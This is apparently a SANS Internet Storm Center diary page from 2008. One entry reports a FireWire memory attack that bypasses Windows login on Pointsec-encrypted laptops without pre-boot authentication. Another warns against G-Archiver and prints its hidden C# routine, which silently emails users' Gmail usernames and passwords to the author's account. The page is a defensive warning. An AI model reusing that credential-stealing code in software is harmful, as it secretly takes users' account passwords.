Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Pointsec Full Disk Encryption cracked

Published: 2008-03-12
Last Updated: 2008-03-13 15:07:51 UTC
by Joel Esler (Version: 3)
0 comment(s)

Castor, one of our readers, wrote in to let us know about this article over at DarkReading. (Clarification:  DarkReading actually didn't write the article it just came in through their news feed section.  Thank you Kelly for writing me and letting me know.)

Headline: LuciData successfully cracks a laptop encrypted with Pointsec Full Disk Encryption on behalf of corporate client

Copy and Paste from article:

"This simple attack takes advantage of the FireWire protocol and its ability to directly access and modify the RAM of a target machine with a FireWire port installed. Using a simple and readily available forensics software tool, it is possible to connect a FireWire cable to a computer, and within seconds bypass the Windows authentication and log in as a local administrator.

This attack is made possible because the operating system on the computer loads and boots directly into Windows without first asking for a Pointsec ‘preboot authentication’ password. Normally, with whole disk encryption, a user is required to enter a password immediately upon turning the machine on. That password is what unlocks the decryption key and allows the rest of the operating system to load and execute. This FireWire attack would not be successful in that case, because the attack requires that Windows already be up and running. In the circumstance of a properly configured encrypted computer, a stolen system that is powered off would be well protected from unauthorized access and this type of attack."

The workaround for this according to Pointsec (Checkpoint) is to have the administrators that have the Pointsec solution deployed in their networks to re-deploy it with the "Pre-boot authentication" enabled.

 Update:  Since this article seems to have generated a bit of controversy, I'll update it.  A couple of points:

#1)  It looks like LuciData is simply trying to throw their hat in the recent ring of "cracking" disk encryption through the firewire interface.  This is largely a marketing press release.

#2)  It also appears to not be a new crack, at face value it looks like the same thing that we've been seeing for a couple weeks now.

#3)  I don't claim credit for the article, I thought it was at least newsworthy since Pointsec put out a fix-it for the problem, that probably should have been done to begin with. 

So for all those people who were thinking that I endorsed the article or something, no.  I just thought it was interesting.

 

Joel Esler

http://www.joelesler.net

 

Keywords:
0 comment(s)

Adobe security updates

Published: 2008-03-12
Last Updated: 2008-03-12 19:34:40 UTC
by Joel Esler (Version: 1)
0 comment(s) 0 comment(s)

Don't use G-Archiver

Published: 2008-03-12
Last Updated: 2008-03-12 19:26:49 UTC
by Joel Esler (Version: 4)
0 comment(s)

I saw this article the other day on Coding Horror, and someone (they didn't leave their name) sent it into us for comment.  Let me just say up front....  there are some aspects of the Coding Horror article that we ,nor I condone or agree with.  Like, deleting all the email and altering the account, etc..  instead of contacting Law Enforcement or Google.   That being said...

The backstory:

G-Archiver (notice I'm not linking to it), is a tool that someone wrote to be able to download all your Google Email and archive it locally.  Problem is that the coder that wrote the program, decided he'd be slick and put his own username and password in the code. 

Whoops.

Yeah, but it wasn't a 'coding mistake'.  He coded it in there, so when someone used this tool, it uploaded YOUR username and password to HIS email account.  (Nice huh?)

Now, I'll put the code below, but I am going to (out of the kindness of my heart, because I am sure the account is probably canceled at this point) remove this dude's password.  Who knows, he might be using it elsewhere.

 

Here's the code:

public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTexxxxx@gmail.com");
message.From = new MailAddress("JTexxxxx@gmail.com", "JTexxx", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTexxxxx@gmail.com", "HIS PASSWORD WAS RIGHT HERE");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}

 

Basically, the lesson learned here is, be careful what you install.

So, to the anonymous person that wrote in asking for comment?  Here's my comment:  Don't install it.  Oh yeah, and "John", the coder of this tool...  Shame on you. 

UPDATE:  Someone wrote in and thought it to be a good idea to remove the actual email address. I complied.

Joel Esler

http://www.joelesler.net

0 comment(s)
Diary Archives